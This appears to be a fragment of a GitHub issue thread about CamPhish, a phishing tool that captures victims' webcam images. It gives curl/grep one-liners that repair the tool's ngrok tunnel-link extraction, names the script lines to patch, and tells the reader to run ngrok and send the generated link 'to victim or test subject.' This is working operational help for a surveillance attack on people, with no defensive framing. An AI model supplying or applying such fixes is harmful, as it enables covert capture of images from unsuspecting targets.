tnsashiq
tnsashiq
`link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -Eo 'https://[^/"]*\.ngrok.io')` >Use this Syntax in the camphish.sh **125 and 208** Lines. _Originally posted by @tnsgaming in https://github.com/techchipnet/CamPhish/issues/84#issuecomment-925157937_
`link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o '[-0-9a-z]*\.ngrok.io')` >Change into this Syntax in these lines - **57, 104, 151, 198, 246, 293, 351, 394, 443, 491, 538, 584, 631, 677,...
**Just run ngrok on 4040 in new terminal** like `./ngrok http 4040` in new terminal And sent that new generated link to victim or test subject. see my old solved...